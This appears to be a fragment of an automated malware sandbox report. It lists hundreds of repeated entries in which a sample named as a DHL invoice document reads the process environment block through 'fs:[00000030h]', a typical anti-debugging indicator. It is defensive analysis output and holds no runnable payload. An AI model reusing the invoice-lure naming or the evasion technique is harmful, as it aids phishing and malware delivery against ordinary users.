          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014920A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01493B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01493B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01471B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01471B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01535BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01469240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014F4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01478A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01483A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01465210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01513D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01487D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01494D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01473D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014EA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01518DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01492581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01462D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014935A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01491DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015305AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_015214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0153070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014FFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01464F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01464F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01478794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014E7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01477E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0152AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0147766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0148AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01498E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0149A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01521608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0146E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_01538ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_014A8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0151FEC0 mov eax, dword ptr fs:[00000030h]
